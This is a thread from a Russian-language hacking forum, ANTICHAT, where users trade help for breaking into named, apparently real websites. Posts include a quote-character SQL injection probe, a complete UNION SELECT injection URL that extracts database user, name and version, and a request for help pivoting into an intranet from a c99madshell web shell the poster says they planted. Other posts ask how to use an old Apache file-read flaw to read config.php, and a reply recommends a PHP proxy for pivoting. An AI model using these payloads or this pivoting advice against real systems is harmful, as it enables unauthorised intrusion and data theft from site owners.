ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'

Нету здесь скули

http://gta.co.ua/file_sa_details.phtml?id=-1+union+select+1,2,3,4,5,6,7,user(),database(),ver sion(),11,12,13,14,15,16,17,18,19,20/*

Здравствуйте!

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо!

поставь проксю https://sourceforge.net/projects/phpproxy/

или можешь настроить редирект

А какая религия запрещает изучить командную строку?

дело не в командной строке я ее знаю более или менее. Человек всегда ищет легкие решения для своих проблем.

З.Ы. По советуйце где есть информация о расположении папок в nix системах.

Нашол уязв

Просмотр запрещенных файлов

Ссылка - http://***.com/<<<<<<<<<<<<
Описание уязвимости : просмотр запрещенных файлов

Уязвимость Apache позволяет злоумышленнику читать недоступные файлы, путем прибавления символа "<" к запросу этих файлов.

Решение:

Установите последнюю версию.
http://www.apache.org/

Ссылки:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017
http://www.apacheweek.com/issues/03-01-24#security

А как ее юзать не знаю подскажите к примеру как прочитать конфиг.пхп

Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))